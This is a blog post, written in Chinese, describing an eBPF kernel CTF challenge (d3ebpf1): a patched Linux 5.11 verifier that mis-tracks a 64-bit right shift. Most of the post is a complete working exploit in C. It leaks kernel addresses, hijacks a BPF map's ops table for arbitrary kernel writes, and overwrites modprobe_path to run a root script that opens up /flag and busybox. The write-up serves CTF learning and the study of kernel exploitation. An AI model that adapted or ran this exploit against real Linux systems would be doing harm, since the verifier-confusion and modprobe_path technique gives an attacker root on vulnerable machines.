d3ebpf1

eBPF CTF
发布日期:   2025-01-14

CHECK

boot

可能没有开kpti;

init

build

开好梯子,vim里复制完整路径?

解压:

tar -xvzf linux-hwe-5.11_5.11.0.orig.tar.gz

patch:

cd linux-5.11
git apply < ../diff #取决于diff文件的具体路径

patch成功:

make menuconfig

sudo sed -i 's/CONFIG_SYSTEM_TRUSTED_KEYS=/#&/' ./.config

查看.config文件发现有调试符号:

确认携带-g参数:

编译:

make bzImage -j$(nproc)

遇到报错:

查看pahole版本:

参考https://blog.csdn.net/woay2008/article/details/132748659

修改scripts/pahole-flags.sh 脚本:

不管用,深入看Makefile:Line1165

逆向分析

diff

只需要关心中间一个,其余两个都是cve;

内核源代码:

https://elixir.bootlin.com/linux/v5.11/source/kernel/bpf/verifier.c

https://elixir.bootlin.com/linux/v5.11/source/kernel/bpf/verifier.c#L6455

所以就是在执行右移操作的时候,检查源寄存器的边界值和架构值的关系,

关闭编译优化:

gcc -O0 demo.c -o d

将一个变量右移64位的时候,会先将移位值加载到寄存器rcx中,然后64位架构只允许最多右移63位,这个指令虽然送进去了cl是8位,但是在CPU处理的时候会仅取其低6位作为移位值,所以也就是0,相当于没操作!

这样这个寄存器的值仍然是1,但是这个寄存器在verifier中却被认为是0,因此,我们获得了一个运行时值为1、确信为0的寄存器!

攻击模板

利用漏洞中的btf_array中任意偏移写:

  1. 劫持map->ops到我们能控制的array空间中;
  2. 在array中部署函数指针;map_push_elem(偏移14*8) = array_map_get_next_key
  3. spin_lock_off = 0 //0x2c,4字节
  4. max_entries = 0xffff ffff //0x24, 4字节
  5. map_type = BPF_MAP_TYPE_STACK // 0x18, 4字节
  6. 调用bpf_update_elem(mapfd, &key, &value, flags) 会查ops试图调用int (*map_push_elem)(struct bpf_map *map, void *value, u64 flags);,但是控制流被劫持到array_map_get_next_key(struct bpf_map *map, void *key, void *next_key),最后达到的效果是 *flags = value[0]+1;
value[2] = 0x12345678;
   value[3] = map + 0x110;
   value[4] = array_map_get_next_key;
   value[5] = BPF_MAP_TYPE_STACK + 0x400000000;
   value[6] = 0xffffffff00002000;
   value[7] = 0LL;

攻击成功

EXP

exp.c:

#define _GNU_SOURCE
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/ioctl.h>
#include <unistd.h>
#include <sched.h>
#include <sys/types.h>
#include <linux/keyctl.h>

size_t user_cs, user_ss, user_rflags, user_sp;
void save_status()
{
    asm volatile (
        "mov user_cs, cs;"
        "mov user_ss, ss;"
        "mov user_sp, rsp;"
        "pushf;"
        "pop user_rflags;"
    );
    puts("\033[34m\033[1m[*] Status has been saved.\033[0m");
}

void get_root_shell(){
    printf("now pid == %p\n", getpid());
    system("/bin/sh");
}

//CPU绑核
void bindCore(int core)
{
    cpu_set_t cpu_set;

    CPU_ZERO(&cpu_set);
    CPU_SET(core, &cpu_set);
    sched_setaffinity(getpid(), sizeof(cpu_set), &cpu_set);

    printf("\033[34m\033[1m[*] Process binded to core \033[0m%d\n", core);
}

#include <linux/bpf.h>
#include <stdint.h>
#include <sys/socket.h>
#include <sys/syscall.h>
#include "bpf_insn.h"

static inline int bpf(int cmd, union bpf_attr *attr)
{
    return syscall(__NR_bpf, cmd, attr, sizeof(*attr));
}

struct bpf_insn prog[] = {
        BPF_LD_MAP_FD(BPF_REG_1, 3),                    
        BPF_MOV64_REG(BPF_REG_2, BPF_REG_10),           
        BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, -8),          
        BPF_ST_MEM(BPF_DW, BPF_REG_2, 0, 0),            
        BPF_RAW_INSN(BPF_JMP | BPF_CALL, 0, 0, 0, BPF_FUNC_map_lookup_elem), //第一个参数是fd,第二个参数是&key,第三个参数 是&value
        /* if success, r0 will be ptr to value, 0 for failed */              
        BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1),          
        BPF_EXIT_INSN(),                                 

        BPF_MOV64_IMM(BPF_REG_6, 0),
        BPF_ALU64_IMM(BPF_LSH, BPF_REG_6, 32),
        BPF_ALU64_IMM(BPF_ADD, BPF_REG_6, 1),

        BPF_MOV64_IMM(BPF_REG_7, 0),
        BPF_ALU64_IMM(BPF_LSH, BPF_REG_7, 32),
        BPF_ALU64_IMM(BPF_ADD, BPF_REG_7, 64),

        BPF_ALU64_REG(BPF_RSH, BPF_REG_6, BPF_REG_7),
        BPF_MOV64_REG(BPF_REG_8, BPF_REG_0),

        BPF_MOV64_REG(BPF_REG_7, BPF_REG_6),
        BPF_ALU64_IMM(BPF_MUL, BPF_REG_6, 0x110),
        BPF_ALU64_REG(BPF_SUB, BPF_REG_8, BPF_REG_6),

        BPF_LD_MAP_FD(BPF_REG_1, 4),
        BPF_MOV64_REG(BPF_REG_2, BPF_REG_10),           
        BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, -16),          
        BPF_ST_MEM(BPF_DW, BPF_REG_2, 0, 0),            
        BPF_RAW_INSN(BPF_JMP | BPF_CALL, 0, 0, 0, BPF_FUNC_map_lookup_elem), //第一个参数是fd,第二个参数是&key,第三个参数 是&value
        /* if success, r0 will be ptr to value, 0 for failed */              
        BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1),          
        BPF_EXIT_INSN(),             

        BPF_MOV64_REG(BPF_REG_9, BPF_REG_0), //r9 -> expmap->array[0]
        BPF_LDX_MEM(BPF_DW, BPF_REG_0, BPF_REG_8,0),
        BPF_STX_MEM(BPF_DW,BPF_REG_9,BPF_REG_0,0x0), 

        BPF_ALU64_IMM(BPF_ADD, BPF_REG_8, 0xc0),
        BPF_LDX_MEM(BPF_DW, BPF_REG_0, BPF_REG_8,0),
        BPF_ALU64_IMM(BPF_ADD, BPF_REG_9, 8),
        BPF_STX_MEM(BPF_DW,BPF_REG_9,BPF_REG_0,0x0), 

        BPF_ALU64_IMM(BPF_ADD, BPF_REG_9, 8),
        BPF_LDX_MEM(BPF_DW, BPF_REG_4, BPF_REG_9,0),
        BPF_JMP_IMM(BPF_JNE, BPF_REG_4, 0, 1),          
        BPF_EXIT_INSN(),  

        //begin aaw
        BPF_ALU64_IMM(BPF_ADD, BPF_REG_9, 8),
        BPF_LDX_MEM(BPF_DW, BPF_REG_4, BPF_REG_9,0), //R4 -> map+0x110
        BPF_ALU64_IMM(BPF_SUB, BPF_REG_8, 0xc0), //R8 -> btf_array
        BPF_STX_MEM(BPF_DW, BPF_REG_8, BPF_REG_4, 0),

        BPF_ALU64_IMM(BPF_ADD, BPF_REG_9, 8),
        BPF_LDX_MEM(BPF_DW, BPF_REG_4, BPF_REG_9,0), //R4 -> array_map_get_next_key
        BPF_ALU64_IMM(BPF_ADD, BPF_REG_8, 0x110+14*8),
        BPF_STX_MEM(BPF_DW, BPF_REG_8, BPF_REG_4, 0),

        BPF_ALU64_IMM(BPF_ADD, BPF_REG_9, 8),
        BPF_LDX_MEM(BPF_DW, BPF_REG_4, BPF_REG_9,0),//R4 -> BPF_MAP_TYPE_STACK + 0x400000000;
        BPF_ALU64_IMM(BPF_SUB, BPF_REG_8, 0x110+14*8),
        BPF_ALU64_IMM(BPF_ADD, BPF_REG_8, 0x18),
        BPF_STX_MEM(BPF_DW, BPF_REG_8, BPF_REG_4, 0),

        BPF_ALU64_IMM(BPF_ADD, BPF_REG_9, 8),
        BPF_LDX_MEM(BPF_DW, BPF_REG_4, BPF_REG_9,0), //R4 -> 0xffffffff00002000
        BPF_ALU64_IMM(BPF_ADD, BPF_REG_8, 0x8), // 0x20
        BPF_STX_MEM(BPF_DW, BPF_REG_8, BPF_REG_4, 0),

        BPF_ALU64_IMM(BPF_ADD, BPF_REG_9, 8),
        BPF_LDX_MEM(BPF_DW, BPF_REG_4, BPF_REG_9,0), //R4 -> 0LL
        BPF_ALU64_IMM(BPF_ADD, BPF_REG_8, 0x8), // 0x28
        BPF_STX_MEM(BPF_DW, BPF_REG_8, BPF_REG_4, 0),


        BPF_MOV64_IMM(BPF_REG_0, 0),
        BPF_EXIT_INSN(),

};


#define BPF_LOG_SZ 0x20000
char bpf_log_buf[BPF_LOG_SZ] = { '\0' };

int sockets[2];
int map_fd1;
int map_fd2;
int prog_fd;
uint32_t key;
uint64_t* value1;
uint64_t* value2;

union bpf_attr attr = {
    .prog_type = BPF_PROG_TYPE_SOCKET_FILTER,
    .insns = (uint64_t) &prog,
    .insn_cnt = sizeof(prog) / sizeof(prog[0]),
    .license = (uint64_t) "GPL",
    .log_level = 2,
    .log_buf = (uint64_t) bpf_log_buf,
    .log_size = BPF_LOG_SZ,
};

static __always_inline int
bpf_map_create(unsigned int map_type, unsigned int key_size,
               unsigned int value_size, unsigned int max_entries)
{
        union bpf_attr attr = {
                .map_type = map_type,
                .key_size = key_size,
                .value_size = value_size,
                .max_entries = max_entries,
        };
        return bpf(BPF_MAP_CREATE, &attr);
}

static __always_inline int
bpf_map_get_elem(int map_fd, const void *key, void *value)
{
    union bpf_attr attr = {
        .map_fd = map_fd,
        .key = (uint64_t)key,
        .value = (uint64_t)value,
    };

    // 使用 BPF_MAP_LOOKUP_ELEM 获取 map 中的元素
    return bpf(BPF_MAP_LOOKUP_ELEM, &attr);
}

size_t ker_offset;

static __always_inline int
bpf_map_update_elem(int map_fd, const void* key, const void* value, uint64_t flags)
{
        union bpf_attr attr = {
                .map_fd = map_fd,
                .key = (uint64_t)key,
                .value = (uint64_t)value,
                .flags = flags,
        };
        return bpf(BPF_MAP_UPDATE_ELEM, &attr);
}

void aaw(int map_fd, size_t addr, size_t val){
    size_t key = 0;
    size_t value[0x1000];
    size_t val1 = val & 0xffffffff;
    val1--;
    size_t val2 = val >> 32;
    val2--;
    value[0] = val1;
    bpf_map_update_elem(map_fd, &key, value, addr);
    value[0] = val2;
    bpf_map_update_elem(map_fd, &key, value, addr+4);

}

int main(){

    save_status();
    bindCore(0);

    int map_fd = bpf_map_create(BPF_MAP_TYPE_ARRAY, sizeof(int), 0x2000, 1);
    if (map_fd < 0) perror("BPF_MAP_CREATE");//, err_exit("BPF_MAP_CREATE");

    int expmap_fd = bpf_map_create(BPF_MAP_TYPE_ARRAY, sizeof(int), 0x2000, 1);
    if (expmap_fd < 0) perror("BPF_MAP_CREATE");//, err_exit("BPF_MAP_CREATE");

    prog_fd = bpf(BPF_PROG_LOAD, &attr);
    if (prog_fd < 0) {
        //puts(bpf_log_buf);
        perror("BPF_PROG_LOAD");
    }			
    printf("prog_fd == %d\n", prog_fd);
    //puts(bpf_log_buf);

    if (socketpair(AF_UNIX, SOCK_DGRAM, 0, sockets) < 0)
        perror("socketpair()");

    if (setsockopt(sockets[1], SOL_SOCKET, SO_ATTACH_BPF, &prog_fd, sizeof(prog_fd)) < 0)
        perror("socketpair SO_ATTACH_BPF");


	char s[0x1000];
	write(sockets[0], s, 0x100);

    size_t key = 0;
    size_t value[0x1000];
    bpf_map_get_elem(expmap_fd, &key, value);
    printf("leak : %p\n", (void *)value[0]);

    ker_offset = value[0] - 0xffffffff820363a0;
    printf("ker_offset == %p\n", (void *)ker_offset);

    printf("map_list == %p\n", (void *)value[1]);
    size_t map = value[1] - 0xc0;
    printf("map == %p\n", (void *)map);

    size_t modprobe_path = ker_offset + 0xffffffff82a6c240;
    size_t array_map_get_next_key = ker_offset + 0xffffffff8120e6b0;

    value[2] = 0x12345678;
    value[3] = map + 0x110;
    value[4] = array_map_get_next_key;
    value[5] = BPF_MAP_TYPE_STACK + 0x400000000;
    value[6] = 0xffffffff00002000;
    value[7] = 0LL;
    bpf_map_update_elem(expmap_fd, &key, value, BPF_ANY);

    write(sockets[0], s, 0x100);

    char path[] = "/tmp/a\x00\x00";
    size_t val;
    memcpy(&val, path, 8);
    aaw(map_fd, modprobe_path, val);

    system("touch /tmp/error");
    int ef = open("/tmp/error", 2);
    write(ef, "\xff\xff\xff\xff", 4);
    close(ef);
    system("chmod +x /tmp/error");

    char shellcode[] = "#!/bin/sh\nchmod 777 /flag\nchmod 777 /bin/busybox\n\x00";
    system("touch /tmp/a");
    int af = open("/tmp/a", 2);
    write(af, shellcode, strlen(shellcode));
    close(af);
    system("chmod +x /tmp/a");
    system("/tmp/error");
    int f = open("/flag", 0);
    char flag[0x100];
    read(f, flag, 0x100);
    puts(flag);
    


}



bpf_insn.h:

/* SPDX-License-Identifier: (GPL-2.0-only OR BSD-2-Clause) */
/* eBPF instruction mini library */
#ifndef __BPF_INSN_H
#define __BPF_INSN_H

struct bpf_insn;

/* ALU ops on registers, bpf_add|sub|...: dst_reg += src_reg */

#define BPF_ALU64_REG(OP, DST, SRC)				\
	((struct bpf_insn) {					\
		.code  = BPF_ALU64 | BPF_OP(OP) | BPF_X,	\
		.dst_reg = DST,					\
		.src_reg = SRC,					\
		.off   = 0,					\
		.imm   = 0 })

#define BPF_ALU32_REG(OP, DST, SRC)				\
	((struct bpf_insn) {					\
		.code  = BPF_ALU | BPF_OP(OP) | BPF_X,		\
		.dst_reg = DST,					\
		.src_reg = SRC,					\
		.off   = 0,					\
		.imm   = 0 })

/* ALU ops on immediates, bpf_add|sub|...: dst_reg += imm32 */

#define BPF_ALU64_IMM(OP, DST, IMM)				\
	((struct bpf_insn) {					\
		.code  = BPF_ALU64 | BPF_OP(OP) | BPF_K,	\
		.dst_reg = DST,					\
		.src_reg = 0,					\
		.off   = 0,					\
		.imm   = IMM })

#define BPF_ALU32_IMM(OP, DST, IMM)				\
	((struct bpf_insn) {					\
		.code  = BPF_ALU | BPF_OP(OP) | BPF_K,		\
		.dst_reg = DST,					\
		.src_reg = 0,					\
		.off   = 0,					\
		.imm   = IMM })

/* Short form of mov, dst_reg = src_reg */

#define BPF_MOV64_REG(DST, SRC)					\
	((struct bpf_insn) {					\
		.code  = BPF_ALU64 | BPF_MOV | BPF_X,		\
		.dst_reg = DST,					\
		.src_reg = SRC,					\
		.off   = 0,					\
		.imm   = 0 })

#define BPF_MOV32_REG(DST, SRC)					\
	((struct bpf_insn) {					\
		.code  = BPF_ALU | BPF_MOV | BPF_X,		\
		.dst_reg = DST,					\
		.src_reg = SRC,					\
		.off   = 0,					\
		.imm   = 0 })

/* Short form of mov, dst_reg = imm32 */

#define BPF_MOV64_IMM(DST, IMM)					\
	((struct bpf_insn) {					\
		.code  = BPF_ALU64 | BPF_MOV | BPF_K,		\
		.dst_reg = DST,					\
		.src_reg = 0,					\
		.off   = 0,					\
		.imm   = IMM })

#define BPF_MOV32_IMM(DST, IMM)					\
	((struct bpf_insn) {					\
		.code  = BPF_ALU | BPF_MOV | BPF_K,		\
		.dst_reg = DST,					\
		.src_reg = 0,					\
		.off   = 0,					\
		.imm   = IMM })

/* BPF_LD_IMM64 macro encodes single 'load 64-bit immediate' insn */
#define BPF_LD_IMM64(DST, IMM)					\
	BPF_LD_IMM64_RAW(DST, 0, IMM)

#define BPF_LD_IMM64_RAW(DST, SRC, IMM)				\
	((struct bpf_insn) {					\
		.code  = BPF_LD | BPF_DW | BPF_IMM,		\
		.dst_reg = DST,					\
		.src_reg = SRC,					\
		.off   = 0,					\
		.imm   = (__u32) (IMM) }),			\
	((struct bpf_insn) {					\
		.code  = 0, /* zero is reserved opcode */	\
		.dst_reg = 0,					\
		.src_reg = 0,					\
		.off   = 0,					\
		.imm   = ((__u64) (IMM)) >> 32 })

#ifndef BPF_PSEUDO_MAP_FD
# define BPF_PSEUDO_MAP_FD	1
#endif

/* pseudo BPF_LD_IMM64 insn used to refer to process-local map_fd */
#define BPF_LD_MAP_FD(DST, MAP_FD)				\
	BPF_LD_IMM64_RAW(DST, BPF_PSEUDO_MAP_FD, MAP_FD)


/* Direct packet access, R0 = *(uint *) (skb->data + imm32) */

#define BPF_LD_ABS(SIZE, IMM)					\
	((struct bpf_insn) {					\
		.code  = BPF_LD | BPF_SIZE(SIZE) | BPF_ABS,	\
		.dst_reg = 0,					\
		.src_reg = 0,					\
		.off   = 0,					\
		.imm   = IMM })

/* Memory load, dst_reg = *(uint *) (src_reg + off16) */

#define BPF_LDX_MEM(SIZE, DST, SRC, OFF)			\
	((struct bpf_insn) {					\
		.code  = BPF_LDX | BPF_SIZE(SIZE) | BPF_MEM,	\
		.dst_reg = DST,					\
		.src_reg = SRC,					\
		.off   = OFF,					\
		.imm   = 0 })

/* Memory store, *(uint *) (dst_reg + off16) = src_reg */

#define BPF_STX_MEM(SIZE, DST, SRC, OFF)			\
	((struct bpf_insn) {					\
		.code  = BPF_STX | BPF_SIZE(SIZE) | BPF_MEM,	\
		.dst_reg = DST,					\
		.src_reg = SRC,					\
		.off   = OFF,					\
		.imm   = 0 })

/*
 * Atomic operations:
 *
 *   BPF_ADD                  *(uint *) (dst_reg + off16) += src_reg
 *   BPF_AND                  *(uint *) (dst_reg + off16) &= src_reg
 *   BPF_OR                   *(uint *) (dst_reg + off16) |= src_reg
 *   BPF_XOR                  *(uint *) (dst_reg + off16) ^= src_reg
 *   BPF_ADD | BPF_FETCH      src_reg = atomic_fetch_add(dst_reg + off16, src_reg);
 *   BPF_AND | BPF_FETCH      src_reg = atomic_fetch_and(dst_reg + off16, src_reg);
 *   BPF_OR | BPF_FETCH       src_reg = atomic_fetch_or(dst_reg + off16, src_reg);
 *   BPF_XOR | BPF_FETCH      src_reg = atomic_fetch_xor(dst_reg + off16, src_reg);
 *   BPF_XCHG                 src_reg = atomic_xchg(dst_reg + off16, src_reg)
 *   BPF_CMPXCHG              r0 = atomic_cmpxchg(dst_reg + off16, r0, src_reg)
 */

#define BPF_ATOMIC_OP(SIZE, OP, DST, SRC, OFF)			\
	((struct bpf_insn) {					\
		.code  = BPF_STX | BPF_SIZE(SIZE) | BPF_ATOMIC,	\
		.dst_reg = DST,					\
		.src_reg = SRC,					\
		.off   = OFF,					\
		.imm   = OP })

/* Legacy alias */
#define BPF_STX_XADD(SIZE, DST, SRC, OFF) BPF_ATOMIC_OP(SIZE, BPF_ADD, DST, SRC, OFF)

/* Memory store, *(uint *) (dst_reg + off16) = imm32 */

#define BPF_ST_MEM(SIZE, DST, OFF, IMM)				\
	((struct bpf_insn) {					\
		.code  = BPF_ST | BPF_SIZE(SIZE) | BPF_MEM,	\
		.dst_reg = DST,					\
		.src_reg = 0,					\
		.off   = OFF,					\
		.imm   = IMM })

/* Conditional jumps against registers, if (dst_reg 'op' src_reg) goto pc + off16 */

#define BPF_JMP_REG(OP, DST, SRC, OFF)				\
	((struct bpf_insn) {					\
		.code  = BPF_JMP | BPF_OP(OP) | BPF_X,		\
		.dst_reg = DST,					\
		.src_reg = SRC,					\
		.off   = OFF,					\
		.imm   = 0 })

/* Like BPF_JMP_REG, but with 32-bit wide operands for comparison. */

#define BPF_JMP32_REG(OP, DST, SRC, OFF)			\
	((struct bpf_insn) {					\
		.code  = BPF_JMP32 | BPF_OP(OP) | BPF_X,	\
		.dst_reg = DST,					\
		.src_reg = SRC,					\
		.off   = OFF,					\
		.imm   = 0 })

/* Conditional jumps against immediates, if (dst_reg 'op' imm32) goto pc + off16 */

#define BPF_JMP_IMM(OP, DST, IMM, OFF)				\
	((struct bpf_insn) {					\
		.code  = BPF_JMP | BPF_OP(OP) | BPF_K,		\
		.dst_reg = DST,					\
		.src_reg = 0,					\
		.off   = OFF,					\
		.imm   = IMM })

/* Like BPF_JMP_IMM, but with 32-bit wide operands for comparison. */

#define BPF_JMP32_IMM(OP, DST, IMM, OFF)			\
	((struct bpf_insn) {					\
		.code  = BPF_JMP32 | BPF_OP(OP) | BPF_K,	\
		.dst_reg = DST,					\
		.src_reg = 0,					\
		.off   = OFF,					\
		.imm   = IMM })

/* Raw code statement block */

#define BPF_RAW_INSN(CODE, DST, SRC, OFF, IMM)			\
	((struct bpf_insn) {					\
		.code  = CODE,					\
		.dst_reg = DST,					\
		.src_reg = SRC,					\
		.off   = OFF,					\
		.imm   = IMM })

/* Program exit */

#define BPF_EXIT_INSN()						\
	((struct bpf_insn) {					\
		.code  = BPF_JMP | BPF_EXIT,			\
		.dst_reg = 0,					\
		.src_reg = 0,					\
		.off   = 0,					\
		.imm   = 0 })

#endif

参考

https://blog.csdn.net/qq_61670993/article/details/136558244

https://arttnba3.cn/2023/05/31/EBPF_0X00/#0x01-eBPF-%E7%9A%84%E5%9F%BA%E6%9C%AC%E6%9E%B6%E6%9E%84

文章作者: q1ming
文章链接: http://example.com/2025/01/14/d3ebpf1/
版权声明: 本博客所有文章除特別声明外,均采用 CC BY 4.0 许可协议。转载请注明来源 q1ming !
eBPF CTF
  目录